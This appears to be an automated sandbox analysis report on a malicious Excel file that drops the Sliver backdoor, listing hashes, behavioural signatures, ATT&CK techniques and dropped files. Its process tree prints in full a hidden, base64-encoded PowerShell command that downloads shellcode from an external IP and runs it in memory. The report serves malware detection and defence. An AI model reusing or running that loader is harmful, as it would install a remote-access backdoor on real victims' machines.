sliver | 4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31

General

Target

4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls
Size

46KB
MD5

8b242d19bd9a2b1186f4ef8de0c4ffa2
SHA1

ac9651800cf0296ef5f545b18eca8b72cf40c9ca
SHA256

4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31
SHA512

89f4221b4eb13128f568dc118c5bf171d9d955e474fec94d8a5139af1afcd4d42a3949aeb32f151178a8168f42885ecf10b6046d68951386df8580d3f1bc565a
SSDEEP

768:r4SFsv66g3KnF439NKC54kkGfn+cL2XdA8YRtukODXwXqt7sNAQYzKEm8ZRu9Uzp:8SFsv66g3KnF439NKC54kkGfn+cL2Xd+

Score

10^/10

sliver backdoor execution trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://194.182.164.149:8080/fontawesome.woff

Signatures

Process spawned unexpected child process 1 IoCs

This typically indicates the parent process was compromised via an exploit or macro.

Processes:

powershell.exe

description	pid	pid_target	Process	procid_target
Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process	2760	3248	powershell.exe	85

Sliver RAT v2 6 IoCs

Processes:

resource	yara_rule
behavioral2/memory/2760-64-0x000001B8BD290000-0x000001B8BDD0E000-memory.dmp	SliverRAT_v2
behavioral2/memory/2760-65-0x000001B8BE790000-0x000001B8BF276000-memory.dmp	SliverRAT_v2
behavioral2/memory/2760-67-0x000001B8BE790000-0x000001B8BF276000-memory.dmp	SliverRAT_v2
behavioral2/memory/2760-66-0x000001B8BE790000-0x000001B8BF276000-memory.dmp	SliverRAT_v2
behavioral2/memory/2760-68-0x000001B8BE790000-0x000001B8BF276000-memory.dmp	SliverRAT_v2
behavioral2/memory/2760-76-0x000001B8BE790000-0x000001B8BF276000-memory.dmp	SliverRAT_v2

Sliver family
sliver
SliverRAT
SliverRAT is an open source Adversary Emulation Framework.
trojan backdoor sliver

Blocklisted process makes network request 24 IoCs

Processes:

powershell.exe

flow	pid	Process
19	2760	powershell.exe
21	2760	powershell.exe
24	2760	powershell.exe
28	2760	powershell.exe
29	2760	powershell.exe
30	2760	powershell.exe
36	2760	powershell.exe
37	2760	powershell.exe
38	2760	powershell.exe
39	2760	powershell.exe
40	2760	powershell.exe
41	2760	powershell.exe
42	2760	powershell.exe
48	2760	powershell.exe
54	2760	powershell.exe
57	2760	powershell.exe
58	2760	powershell.exe
59	2760	powershell.exe
60	2760	powershell.exe
61	2760	powershell.exe
62	2760	powershell.exe
63	2760	powershell.exe
64	2760	powershell.exe
65	2760	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

Processes:

powershell.exe

pid	Process
2760	powershell.exe

Checks processor information in registry 2 TTPs 3 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	EXCEL.EXE

Enumerates system info in registry 2 TTPs 3 IoCs

Query Registry

T1012

System Information Discovery

T1082

Processes:

EXCEL.EXE

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\BIOS	EXCEL.EXE
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily	EXCEL.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid	Process
3248	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 2 IoCs

Processes:

powershell.exe

pid	Process
2760	powershell.exe
2760	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

Processes:

powershell.exe

description	pid	Process
Token: SeDebugPrivilege	2760	powershell.exe

Suspicious use of SetWindowsHookEx 12 IoCs

Processes:

EXCEL.EXE

pid	Process
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE
3248	EXCEL.EXE

Suspicious use of WriteProcessMemory 6 IoCs

Processes:

EXCEL.EXEpowershell.execsc.exe

description	pid	Process	procid_target
PID 3248 wrote to memory of 2760	3248	EXCEL.EXE	90
PID 3248 wrote to memory of 2760	3248	EXCEL.EXE	90
PID 2760 wrote to memory of 2576	2760	powershell.exe	92
PID 2760 wrote to memory of 2576	2760	powershell.exe	92
PID 2576 wrote to memory of 4820	2576	csc.exe	94
PID 2576 wrote to memory of 4820	2576	csc.exe	94

C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\4ec853d9972a4da2aee5ceb0d7820b0bf419a26f0e2a90d06e9562ae80d94a31.xls"
1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:3248
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -nop -w hidden -Enc JABXAGkAbgAzADIAIAA9ACAAQAAiAA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAFIAdQBuAHQAaQBtAGUALgBJAG4AdABlAHIAbwBwAFMAZQByAHYAaQBjAGUAcwA7AA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFcAaQBuADMAMgAgAHsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZAB3AFMAaQB6AGUALAANAAoAIAAgACAAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsADQAKAFsARABsAGwASQBtAHAAbwByAHQAKAAiAGsAZQByAG4AZQBsADMAMgAiACwAIABDAGgAYQByAFMAZQB0AD0AQwBoAGEAcgBTAGUAdAAuAEEAbgBzAGkAKQBdAA0ACgBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsAA0ACgAgACAAIAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAANAAoAIAAgACAAIABJAG4AdABQAHQAcgAgAGwAcABTAHQAYQByAHQAQQBkAGQAcgBlAHMAcwAsAA0ACgAgACAAIAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwADQAKACAAIAAgACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQASQBkACkAOwANAAoAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgAsACAAUwBlAHQATABhAHMAdABFAHIAcgBvAHIAPQB0AHIAdQBlACkAXQANAAoAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAAVQBJAG4AdAAzADIAIABXAGEAaQB0AEYAbwByAFMAaQBuAGcAbABlAE8AYgBqAGUAYwB0ACgADQAKACAAIAAgACAASQBuAHQAUAB0AHIAIABoAEgAYQBuAGQAbABlACwADQAKACAAIAAgACAAVQBJAG4AdAAzADIAIABkAHcATQBpAGwAbABpAHMAZQBjAG8AbgBkAHMAKQA7AA0ACgB9AA0ACgAiAEAADQAKAEEAZABkAC0AVAB5AHAAZQAgACQAVwBpAG4AMwAyAA0ACgANAAoAIwAgAEkAUwBDAHsAaABlAGMAYQByAG0AZQBuAF8AdwBhAHMAXwBoAGUAcgBlAH0ADQAKAFsAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAHIAdgBlAHIAQwBlAHIAdABpAGYAaQBjAGEAdABlAFYAYQBsAGkAZABhAHQAaQBvAG4AQwBhAGwAbABiAGEAYwBrACAAPQAgAHsAJAB0AHIAdQBlAH0AIAA7AA0ACgAkAHMAaABlAGwAbABjAG8AZABlACAAPQAgACgATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAEwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAEQAYQB0AGEAKAAiAGgAdAB0AHAAcwA6AC8ALwAxADkANAAuADEAOAAyAC4AMQA2ADQALgAxADQAOQA6ADgAMAA4ADAALwBmAG8AbgB0AGEAdwBlAHMAbwBtAGUALgB3AG8AZgBmACIAKQANAAoAaQBmACAAKAAkAHMAaABlAGwAbABjAG8AZABlACAALQBlAHEAIAAkAG4AdQBsAGwAKQAgAHsARQB4AGkAdAB9ADsADQAKACQAcwBpAHoAZQAgAD0AIAAkAHMAaABlAGwAbABjAG8AZABlAC4ATABlAG4AZwB0AGgADQAKAA0ACgBbAEkAbgB0AFAAdAByAF0AJABhAGQAZAByACAAPQAgAFsAVwBpAG4AMwAyAF0AOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsACQAcwBpAHoAZQAsADAAeAAxADAAMAAwACwAMAB4ADQAMAApADsADQAKAFsAUwB5AHMAdABlAG0ALgBSAHUAbgB0AGkAbQBlAC4ASQBuAHQAZQByAG8AcABTAGUAcgB2AGkAYwBlAHMALgBNAGEAcgBzAGgAYQBsAF0AOgA6AEMAbwBwAHkAKAAkAHMAaABlAGwAbABjAG8AZABlACwAIAAwACwAIAAkAGEAZABkAHIALAAgACQAcwBpAHoAZQApAA0ACgAkAHQAaABhAG4AZABsAGUAPQBbAFcAaQBuADMAMgBdADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJABhAGQAZAByACwAMAAsADAALAAwACkAOwANAAoAWwBXAGkAbgAzADIAXQA6ADoAVwBhAGkAdABGAG8AcgBTAGkAbgBnAGwAZQBPAGIAagBlAGMAdAAoACQAdABoAGEAbgBkAGwAZQAsACAAWwB1AGkAbgB0ADMAMgBdACIAMAB4AEYARgBGAEYARgBGAEYARgAiACkA
  2⤵
  - Process spawned unexpected child process
  - Blocklisted process makes network request
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:2760
- - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fz5m5l4m\fz5m5l4m.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2576
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE290.tmp" "c:\Users\Admin\AppData\Local\Temp\fz5m5l4m\CSC46B605F05C0F4918937378D688A97239.TMP"
      4⤵
      PID:4820

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

1

T1059

PowerShell

1

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

2

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESE290.tmp

Filesize
1KB

MD5
9c796bf758e8597b8938d3348daab8b6

SHA1
8a58a301c2ba43fa5dde07494cf0720273c2c179

SHA256
67f480c13e65c81c768476fbb30a70e3afe3148157abcad5bfc26bf7fb43a765

SHA512
9de44d5c9ea5fe13f158ef6c436a0fb1e700c8d0568e78d88649bf48cf4bc6cedee583e74f997794ae520c8e502a60515d45834321def7a26215bcc027d672a2

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vhcdfkzo.zlc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\fz5m5l4m\fz5m5l4m.dll

Filesize
3KB

MD5
fc3fa9fa3964cd63f2593dde90686223

SHA1
8f4720b0c9708326c5b1d0fafeed666a51ccf515

SHA256
e591249684a2324ef6236c2eea78bb9baf58c575589dc5e36a152599de397072

SHA512
46a46170e44d0494d65720fdb0efed7f28eefb15ae1287da3a7dd9b571c83cf3f3690eb769f2d3208fcc0763c4c3a482b55258ee49e560a0a924534770a6c230

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5m5l4m\CSC46B605F05C0F4918937378D688A97239.TMP

Filesize
652B

MD5
c6dce444bf55f21356e03a773307d068

SHA1
8e2cdd94195b2abd4de964df25ff460f85b3d961

SHA256
5d3cc3abc75f9b49cb9a62369e26ba5446e6dea75adfe993b5a38be2859f1a82

SHA512
764e47f2d499982e452ad4255f2c14c308ac58d4546187148edab0080e834b0f9ef4bc1e54b21101d7368ab3ba7eb6ee6d33cf1060bd3f53d55d0e3bec81fe07

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5m5l4m\fz5m5l4m.0.cs

Filesize
631B

MD5
f4dd5c682eb7b3b679f084261bfc7c4c

SHA1
70f75d7a4e42c185eb09139ed3c6f7338a2219c2

SHA256
2908bfece2edd241dc4f7cc26608c3254f7e5b896a38114618d56b65d4fc4319

SHA512
8f91148a6bd15f8182ef00b3e75b008eacda414852e8169112013377e4b9b88e1a0be73c8e0c212b8c0a51c24fbb2849c44d742f6019c9c5bf0dfb0e28a1b83d

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\fz5m5l4m\fz5m5l4m.cmdline

Filesize
369B

MD5
7d8a998c5b34aec3dc91cafa05c53151

SHA1
3b75b912838861f37fe4205dee89978a7258224e

SHA256
539704862f38a2b1a7f09aade9b8838bcd12185548df9af97f0149286bf7bd80

SHA512
f244cbe12931bf73c66b75260b037f3fd71d7627bcb6f4479a700a990699c3e8cc2984beaa23e7cde35c6bd87390b772d7a5792ec9a12f6e509de4620061db2b

Download Submit
memory/2760-66-0x000001B8BE790000-0x000001B8BF276000-memory.dmp

Filesize
10.9MB

Download
memory/2760-58-0x000001B8BCCD0000-0x000001B8BCCD8000-memory.dmp

Filesize
32KB

Download
memory/2760-64-0x000001B8BD290000-0x000001B8BDD0E000-memory.dmp

Filesize
10.5MB

Download
memory/2760-65-0x000001B8BE790000-0x000001B8BF276000-memory.dmp

Filesize
10.9MB

Download
memory/2760-67-0x000001B8BE790000-0x000001B8BF276000-memory.dmp

Filesize
10.9MB

Download
memory/2760-68-0x000001B8BE790000-0x000001B8BF276000-memory.dmp

Filesize
10.9MB

Download
memory/2760-76-0x000001B8BE790000-0x000001B8BF276000-memory.dmp

Filesize
10.9MB

Download
memory/2760-33-0x000001B8BC960000-0x000001B8BC982000-memory.dmp

Filesize
136KB

Download
memory/3248-16-0x00007FFBCE540000-0x00007FFBCE550000-memory.dmp

Filesize
64KB

Download
memory/3248-1-0x00007FFC10D0D000-0x00007FFC10D0E000-memory.dmp

Filesize
4KB

Download
memory/3248-18-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-5-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-4-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-3-0x00007FFBD0CF0000-0x00007FFBD0D00000-memory.dmp

Filesize
64KB

Download
memory/3248-2-0x00007FFBD0CF0000-0x00007FFBD0D00000-memory.dmp

Filesize
64KB

Download
memory/3248-30-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-29-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-19-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-17-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-14-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-15-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-20-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-6-0x00007FFBD0CF0000-0x00007FFBD0D00000-memory.dmp

Filesize
64KB

Download
memory/3248-8-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-13-0x00007FFBCE540000-0x00007FFBCE550000-memory.dmp

Filesize
64KB

Download
memory/3248-62-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-63-0x00007FFC10D0D000-0x00007FFC10D0E000-memory.dmp

Filesize
4KB

Download
memory/3248-10-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-11-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-12-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-9-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-7-0x00007FFBD0CF0000-0x00007FFBD0D00000-memory.dmp

Filesize
64KB

Download
memory/3248-69-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-73-0x00007FFC10C70000-0x00007FFC10E65000-memory.dmp

Filesize
2.0MB

Download
memory/3248-0-0x00007FFBD0CF0000-0x00007FFBD0D00000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads